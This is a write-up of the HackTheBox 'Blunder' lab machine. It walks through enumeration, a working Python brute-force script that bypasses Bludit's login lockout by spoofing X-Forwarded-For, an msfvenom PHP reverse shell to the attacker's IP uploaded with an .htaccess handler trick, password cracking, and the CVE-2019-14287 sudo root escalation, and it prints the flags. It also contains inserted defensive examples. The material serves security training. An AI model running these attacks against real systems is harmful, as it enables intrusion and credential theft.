HackTheBox-Machines-Blunder

From aldeid


OS: Linux
Difficulty: Easy
Points: 20
Release: 30 May 2020
IP: 10.10.10.191

User flag

Services Enumeration

Let’s start by enumerating the services on the machine. Nmap reveals that only 1 port is open: the web server, running on its standard port (80).

PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

Initial foothold

Main page

Accessing the website shows a blog with 3 posts. The source code discloses several paths, 1 of which involves the /bl-kernel/ directory, where directory listing is enabled. This directory contains several PHP files, and clicking on one of them displays the message Bludit CMS.

Bludit CMS

At the time of this writing, the latest version of Bludit CMS (https://www.bludit.com/) is 3.13.1.

The source code reveals that the version installed is 3.9.2:

<!-- Include Bootstrap CSS file bootstrap.css -->
<link rel="stylesheet" type="text/css" href="http://10.10.10.191/bl-kernel/css/bootstrap.min.css?version=3.9.2">

<!-- Include CSS Styles from this theme -->
<link rel="stylesheet" type="text/css" href="http://10.10.10.191/bl-themes/blogx/css/style.css?version=3.9.2">

Hidden directories and files

There is no robots.txt file, but enumerating the web server with gobuster reveals several hidden locations and hidden files:

[email protected]:/data/tmp$ gobuster dir -u http://10.10.10.191 -x php,bak,old,zip,txt,tar,gz -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.191
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,bak,old,zip,txt,tar,gz
[+] Timeout:        10s
===============================================================
2020/09/09 11:07:06 Starting gobuster
===============================================================
[REDACTED]
/about (Status: 200)
/admin (Status: 301)
/cgi-bin/ (Status: 301)
/install.php (Status: 200)
/LICENSE (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/todo.txt (Status: 200)
===============================================================
2020/09/09 11:35:21 Finished
===============================================================

The /admin location shows an authentication form, but trying to enter common credentials (with username admin, root or bludit) only leads to authentication failures.

The todo.txt file is interesting because it discloses a username (fergus):

[email protected]:/data/vpn$ curl -s http://10.10.10.191/todo.txt
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING

Brute forcing the authentication form

After searching for documents on brute force attacks against the Bludit CMS, I found this post that explains how to bypass the internal anti-brute force mechanism, and even provides a Python 3 script.

I created a custom wordlist based on the web page, with the default depth settings, as follows:

[email protected]:/data/tmp$ cewl -w passwords.txt http://10.10.10.191

I slightly adapted the script to read this wordlist as follows:

#!/usr/bin/env python3
import re
import requests

host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
# Load the cewl-generated wordlist, one candidate per line
with open('passwords.txt') as f:
    wordlist = [x.strip() for x in f]

for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[*] Trying: {p}'.format(p = password))

    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break

The script was able to find valid credentials for the fergus user:

[email protected]:/data/tmp$ python3 bf.py 
[*] Trying: the
[*] Trying: Load
[*] Trying: Plugins

[REDACTED]

[*] Trying: best
[*] Trying: fictional
[*] Trying: character
[*] Trying: RolandDeschain

SUCCESS: Password found!
Use fergus:RolandDeschain to login.
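
Why a fresh X-Forwarded-For value per attempt defeats a lockout, and how the server side should choose its key, as an added example that is not from the original page or from Bludit's code. It assumes a lockout counter keyed on the client address; LoginLimiter, TRUSTED_PROXIES and the proxy address are hypothetical, and the attempts are constructed.

```python
import ipaddress
from collections import defaultdict

# Assumption: the only reverse proxy allowed to set X-Forwarded-For.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}
MAX_FAILURES = 5


def naive_client_ip(peer_ip, headers):
    """Weak pattern: believe whatever the request says about its origin."""
    return headers.get("X-Forwarded-For", peer_ip)


def hardened_client_ip(peer_ip, headers):
    """Use the TCP peer address unless the peer is a trusted proxy."""
    peer = ipaddress.ip_address(peer_ip)
    if peer not in TRUSTED_PROXIES:
        return str(peer)
    # Walk the chain right to left and return the first hop we do not run.
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",")]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            break  # junk such as a password guess is never a valid key
        if addr not in TRUSTED_PROXIES:
            return str(addr)
    return str(peer)


class LoginLimiter:
    """Counts failed logins per resolved client address."""

    def __init__(self, resolve_ip):
        self.resolve_ip = resolve_ip
        self.failures = defaultdict(int)

    def failed_login(self, peer_ip, headers):
        """Record a failed login; return True once the source is blocked."""
        key = self.resolve_ip(peer_ip, headers)
        self.failures[key] += 1
        return self.failures[key] >= MAX_FAILURES


def replay(limiter, guesses, peer_ip="10.10.14.22"):
    """Feed constructed failed attempts shaped like the script's requests."""
    return [limiter.failed_login(peer_ip, {"X-Forwarded-For": g}) for g in guesses]


# Constructed sample: six wrong guesses, each also sent as the header value.
GUESSES = ["the", "Load", "Plugins", "best", "fictional", "character"]
```

With the naive resolver every attempt lands in its own bucket and the limiter never trips; with the hardened resolver all six attempts count against the peer address and the fifth one is blocked.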

Directory Traversal exploit

Having valid credentials (fergus:RolandDeschain), I was able to log in at the /admin URL and navigate through the backend. I found a form to post content and upload an image.

Looking for exploits affecting this release confirmed that there is a possible directory traversal vulnerability:

[email protected]:/data/tmp$ searchsploit bludit 3.9.2
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
Bludit 3.9.2 - Directory Traversal                                                 | multiple/webapps/48701.txt
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

I downloaded the exploit and started to prepare the necessary files, as explained in the exploit itself. We need to generate 2 files, as follows:

[email protected]:/data/tmp/files$ msfvenom -p php/reverse_php LHOST=10.10.14.22 LPORT=4444 -f raw -b '"' > evil.png
[email protected]:/data/tmp/files$ echo -e "<?php $(cat evil.png)" > evil.png
[email protected]:/data/tmp/files$ echo "RewriteEngine off" > .htaccess
[email protected]:/data/tmp/files$ echo "AddType application/x-httpd-php .png" >> .htaccess

Once done, we need to change the IP and port in the Python file, and we can run the exploit:

[email protected]:/data/tmp/files$ python3 48701.py 
cookie: apnks075c2p3g17ir7otfnok26
csrf_token: 860c0faaf34d652892fb09e7561b568e7e38dd93
Uploading payload: evil.png
Uploading payload: .htaccess

At this stage, the malicious content has been uploaded, and we need to start a listener:

$ rlwrap nc -nlvp 4444

Now, browsing the following URL will call our reverse shell: http://10.10.10.191/bl-content/tmp/temp/evil.png
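
A defender-side sweep for the two artifacts this step leaves behind (a media file containing PHP and an .htaccess that remaps .png to the PHP handler), as an added example that is not part of the original write-up. The function names and the sample files are constructed; point scan_upload_dir at your own upload directory.

```python
import os
import re

# Extensions that should only ever hold static media in an upload directory.
MEDIA_EXT = {".png", ".jpg", ".jpeg", ".gif", ".svg"}
SCRIPT_EXT = {".php", ".phtml", ".phar"}
# .htaccess directives that make Apache hand a file to PHP.
HANDLER_RE = re.compile(r"^\s*(AddType|AddHandler|SetHandler)\b.*php", re.I | re.M)
PHP_TAG_RE = re.compile(rb"<\?php", re.I)


def scan_upload_dir(root):
    """Return sorted (relative_path, reason) findings under an upload directory."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            ext = os.path.splitext(name)[1].lower()
            try:
                with open(path, "rb") as fh:
                    data = fh.read(1024 * 1024)  # inspect the first 1 MiB only
            except OSError:
                continue
            if name == ".htaccess":
                if HANDLER_RE.search(data.decode("utf-8", "replace")):
                    findings.append((rel, "htaccess maps files to the PHP handler"))
                else:
                    findings.append((rel, "htaccess present in upload directory"))
            elif ext in MEDIA_EXT and PHP_TAG_RE.search(data):
                findings.append((rel, "PHP open tag inside media file"))
            elif ext in SCRIPT_EXT:
                findings.append((rel, "script file in upload directory"))
    return sorted(findings)


def build_sample(root):
    """Write constructed files mirroring the two uploads described above."""
    samples = {
        "evil.png": b"<?php /* constructed placeholder, no payload */ ?>",
        ".htaccess": b"RewriteEngine off\nAddType application/x-httpd-php .png\n",
        "cat.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,  # benign image header
    }
    for name, data in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)
```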

Lateral move

In the reverse shell, I started to browse the file system, and noticed that there are 2 users under the /home directory (hugo and shaun). The user.txt flag is in Hugo’s home but we can’t access it. A lateral move to hugo is obviously required.

[email protected]:~$ ls -la /home/hugo
ls -la /home/hugo
total 80
drwxr-xr-x 16 hugo hugo 4096 Sep  9 12:39 .
drwxr-xr-x  4 root root 4096 Apr 27 14:31 ..
lrwxrwxrwx  1 root root    9 Apr 28 12:13 .bash_history -> /dev/null
-rw-r--r--  1 hugo hugo  220 Nov 28  2019 .bash_logout
-rw-r--r--  1 hugo hugo 3771 Nov 28  2019 .bashrc
drwx------ 13 hugo hugo 4096 Apr 27 14:29 .cache
drwx------ 11 hugo hugo 4096 Nov 28  2019 .config
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Desktop
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Documents
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Downloads
drwx------  3 hugo hugo 4096 Apr 27 14:30 .gnupg
drwxrwxr-x  3 hugo hugo 4096 Nov 28  2019 .local
drwx------  5 hugo hugo 4096 Apr 27 14:29 .mozilla
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Music
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Pictures
-rw-r--r--  1 hugo hugo  807 Nov 28  2019 .profile
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Public
drwx------  2 hugo hugo 4096 Apr 27 14:30 .ssh
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Templates
-r--------  1 hugo hugo   33 Sep  9 09:21 user.txt
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Videos

Analyzing the /var/www directory was interesting because I noticed the presence of 2 instances of the Bludit CMS. Analyzing the configuration files in the most recent version led to disclosing Hugo’s password hash:

$ cat /var/www/bludit-3.10.0a/bl-content/databases/users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""}
}

The hash (faca404fd5c0a31cf1897b823c695c85cffeb98d) corresponds to Password120 (https://sha1.gromweb.com/?hash=faca404fd5c0a31cf1897b823c695c85cffeb98d). Let’s switch to hugo:

[email protected]:/var/www/bludit-3.9.2/bl-content/tmp/temp$ su hugo
su hugo
Password: Password120

[email protected]:/var/www/bludit-3.9.2/bl-content/tmp/temp$ id
id
uid=1001(hugo) gid=1001(hugo) groups=1001(hugo)

User flag

Now, we can get the user flag:

[email protected]:~$ cat /home/hugo/user.txt
fce4e1ae48b2333b6d46379152876f66

User flag: fce4e1ae48b2333b6d46379152876f66

Root flag

Escalation

Checking hugo’s privileges with sudo -l indicates that we are allowed to execute /bin/bash as any user but root:

[email protected]:~$ sudo -l
sudo -l
Password: Password120

Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash

However, we can exploit CVE-2019-14287 (https://www.exploit-db.com/exploits/47502) and elevate to root:

[email protected]:~$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
[email protected]:/home/hugo# id
id
uid=0(root) gid=1001(hugo) groups=1001(hugo)
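
A check for this exposure on your own hosts, as an added example that is not from the original page: it flags Runas lists that allow ALL but negate root when sudo is older than 1.8.28, the release that fixed CVE-2019-14287. The version string is a constructed sample (the page does not show the installed sudo version); the rule text is the sudo -l output above.

```python
import re

FIXED_IN = (1, 8, 28)  # CVE-2019-14287 is fixed in sudo 1.8.28
# "(runas) [TAG: ...] command" as printed by sudo -l
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*(?:[A-Z_]+:\s*)*(\S.*)$")

# Constructed sample of "sudo -V" output.
SUDO_V = "Sudo version 1.8.25p1"
# Rule lines as shown in the sudo -l output above.
SUDO_L = """User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
"""


def parse_sudo_version(text):
    """Extract (major, minor, patch) from 'sudo -V' style output."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("no sudo version found")
    return tuple(int(x) for x in m.groups())


def risky_rules(sudo_l_output):
    """Return (runas, command) for rules that allow ALL users but negate root."""
    out = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        runas_users = m.group(1).split(":")[0]  # drop the optional group list
        users = [u.strip() for u in runas_users.split(",")]
        if "ALL" in users and any(u in ("!root", "!#0") for u in users):
            out.append((m.group(1).strip(), m.group(2).strip()))
    return out


def audit(sudo_v_output, sudo_l_output):
    """Combine the version check with the rule check."""
    version = parse_sudo_version(sudo_v_output)
    rules = risky_rules(sudo_l_output)
    return {
        "version": version,
        "affected": version < FIXED_IN and bool(rules),
        "rules": rules,
    }
```

Upgrading sudo closes the bypass; replacing the negated Runas list with an explicit list of permitted target users removes the reliance on a blacklist altogether.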

Root flag

Let’s get the root flag:

[email protected]:/root# cat /root/root.txt
cat /root/root.txt
4926d71e37b6c245b9c997a55041cff1

Root flag: 4926d71e37b6c245b9c997a55041cff1


Keywords: ctf hackthebox HTB bluditcms bruteforce directorytraversal CVE-2019-14287